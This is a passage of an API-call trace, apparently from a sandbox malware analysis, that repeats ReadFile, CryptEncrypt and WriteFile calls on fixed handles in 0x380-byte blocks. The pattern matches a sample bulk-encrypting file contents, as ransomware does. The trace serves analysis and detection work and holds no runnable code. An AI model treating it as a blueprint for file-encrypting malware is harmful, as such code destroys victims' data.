nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.653] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.654] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.655] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.656] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.657] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.660] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.661] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: 